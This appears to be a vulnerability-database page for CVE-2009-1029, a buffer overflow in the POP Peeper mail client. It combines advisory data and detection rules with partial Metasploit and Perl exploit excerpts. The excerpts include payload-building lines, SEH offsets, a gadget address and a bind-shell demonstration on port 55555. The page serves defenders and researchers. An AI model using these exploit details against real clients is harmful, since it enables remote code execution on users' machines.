CVE-2009-1029
published 2009-03-20CVE-2009-1029: Stack-based buffer overflow in POP Peeper 3.4.0.0 and earlier allows remote POP3 servers to execute arbitrary code via a long Date header, related to Imap.dll.
PriorityP356critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
31.84%
98.1th percentile
Stack-based buffer overflow in POP Peeper 3.4.0.0 and earlier allows remote POP3 servers to execute arbitrary code via a long Date header, related to Imap.dll.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| poppeeper | pop_peeper | <= 3.4.0.0 | — |
| poppeeper | pop_peeper | — | — |
| poppeeper | pop_peeper | — | — |
| poppeeper | pop_peeper | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandsploit = "+OK\r\n1 " + rand_text_alpha_upper(1072) + generate_seh_payload(target.ret) + "\r\n.\r\n"↗
commandsploit = "Date: " + rand_text_alpha_upper(132) + generate_seh_payload(target.ret) + "\r\n.\r\n"↗
bytes↗
0x909006EB (JMP 6 next SEH)
bytes↗
0x10014E39 (Imap.dll pop pop ret SEH handler)
- →Detect oversized POP3 UIDL response lines: a UIDL response containing more than ~1072 alphanumeric characters on a single line is anomalous and indicative of this exploit. ↗
- →Detect oversized POP3 Date headers: a Date header exceeding 132 bytes in a POP3 message delivery context is anomalous and indicative of this exploit. ↗
- →Monitor for POP3 servers (port 110) sending responses with SEH overwrite patterns: look for the byte sequence 0x909006EB (JMP 6 nop sled stub) followed by 0x10014E39 in POP3 traffic. ↗
- →The exploit payload bad characters are null byte, LF, space, and CR — encoded payload will be alphanumeric mixed; detect long alphanumeric-only strings in POP3 UIDL or Date fields as a sign of AlphanumMixed encoding. ↗
- →Flag rogue POP3 servers (acting as listener on port 110) that send bind-shell shellcode; post-exploitation bind shell on port 55555 may indicate successful exploitation. ↗
- ·The SEH return address 0x10014E39 is specific to Imap.dll as shipped with POP Peeper v3.4 on Windows XP; this gadget address will differ on other OS versions or DLL builds. ↗
- ·The UIDL overflow requires 1072 bytes of padding before the SEH payload, while the Date overflow requires only 132 bytes — these offsets are specific to POP Peeper v3.4.0.0. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)
exploitdb·2010-11-30
CVE-2009-1029 POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)
POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)
---
##
# $Id: poppeeper_uidl.rb 11180 2010-11-30 20:19:18Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'POP Peeper v3.4 UIDL Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in POP Peeper v3.4.
When a specially crafted UIDL string is sent to a client,
an attacker may be able to execute arbitrary code. This
module is based off of krakowlabs code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11180 $',
'References' =>
[
[ 'OSVDB', '53559
Exploit-DB
POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)
exploitdb·2010-11-11
CVE-2009-1029 POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)
POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)
---
##
# $Id: poppeeper_date.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'POP Peeper v3.4 DATE Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in POP Peeper v3.4.
When a specially crafted DATE string is sent to a client,
an attacker may be able to execute arbitrary code. This
module is based off of krakowlabs code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10998 $',
'References' =>
[
[ 'CVE', '2009-10
Exploit-DB
POP Peeper 3.4.0.0 - Date Remote Buffer Overflow
exploitdb·2009-03-12
CVE-2009-1029 POP Peeper 3.4.0.0 - Date Remote Buffer Overflow
POP Peeper 3.4.0.0 - Date Remote Buffer Overflow
---
#!/usr/bin/perl
# KL0309EXP-poppeeper_date-bof.pl
# 03.12.2009
# Krakow Labs Development [www.krakowlabs.com]
# POP Peeper 3.4.0.0 Date Remote Buffer Overflow Exploit
#
# SEH overwrite exploitation, uses Imap.dll (included with POP Peeper) for universal
# exploitation (more love for no /SafeSEH). Tested on Windows XP SP3.
#
# rush@KL (Jeremy Brown) [[email protected]]
#
# rush@linux:~$ sudo perl KL0309EXP-poppeeper_date-bof.pl
# xx.xx.xx.xx
# rush@linux:~$ nc xx.xx.xx.xx 55555
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\POP Peeper>exit
# exit
# rush@linux:~$
#
# Associated Files & Information:
# http://www.krakowlabs.com/res/adv/KL0309ADV-poppeeper_date-bof.txt
# http://www
Metasploit
POP Peeper v3.4 DATE Buffer Overflow
metasploit
POP Peeper v3.4 DATE Buffer Overflow
POP Peeper v3.4 DATE Buffer Overflow
This module exploits a stack buffer overflow in POP Peeper v3.4. When a specially crafted DATE string is sent to a client, an attacker may be able to execute arbitrary code. This module is based off of krakowlabs code.
Metasploit
POP Peeper v3.4 UIDL Buffer Overflow
metasploit
POP Peeper v3.4 UIDL Buffer Overflow
POP Peeper v3.4 UIDL Buffer Overflow
This module exploits a stack buffer overflow in POP Peeper v3.4. When a specially crafted UIDL string is sent to a client, an attacker may be able to execute arbitrary code. This module is based off of krakowlabs code.
No writeups or analysis indexed.
http://secunia.com/advisories/34077http://www.krakowlabs.com/res/adv/KL0309ADV-poppeeper_date-bof.txthttp://www.securityfocus.com/archive/1/501701/100/0/threadedhttp://www.securityfocus.com/bid/34093https://exchange.xforce.ibmcloud.com/vulnerabilities/49215https://www.exploit-db.com/exploits/8203http://secunia.com/advisories/34077http://www.krakowlabs.com/res/adv/KL0309ADV-poppeeper_date-bof.txthttp://www.securityfocus.com/archive/1/501701/100/0/threadedhttp://www.securityfocus.com/bid/34093https://exchange.xforce.ibmcloud.com/vulnerabilities/49215https://www.exploit-db.com/exploits/8203
2009-03-20
Published